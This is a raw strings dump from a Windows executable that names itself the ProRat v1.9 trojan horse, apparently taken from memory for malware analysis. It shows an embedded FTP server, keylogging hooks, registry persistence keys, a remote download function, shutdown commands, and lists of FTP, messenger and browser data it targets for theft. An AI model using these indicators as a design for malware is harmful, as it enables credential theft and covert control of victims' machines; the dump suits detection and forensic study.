@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
220 Welcom to ProRat Ftp Server
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc
KERNEL32.DLL
ADVAPI32.DLL
AVICAP32.DLL
COMCTL32.DLL
GDI32.DLL
OLE32.DLL
OLEAUT32.DLL
SHELL32.DLL
URLMON.DLL
WINMM.DLL
WINSPOOL.DRV
WS2_32.DLL
WSOCK32.DLL
JPEG error #%d

lncom.exe_2716_rwx_00401000_001F9000:




Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
Uh.xC
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpString@
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbort
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpClid
OnProcessHeader8
TSyncSmtpCli
smtp
SMTP component not ready
SMTP component not connected
SMTP component already connected
426 Operation aborted.
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException`_D
EFtpCtrlSocketExceptionD_D
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWordT
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeysd2E
AutoHotkeys
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowStated4E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.rsrc
.reloc
.aspack
.adata
>%U:f{
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
hodll.dll
mfc42.dll
msvcrt.dll
`.rdata
@.data
.HookSec
B[ ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey ]
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
0'04090?0
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
VVV.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
ProRat@Yahoo.Com
<ProRat@Yahoo.Com>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
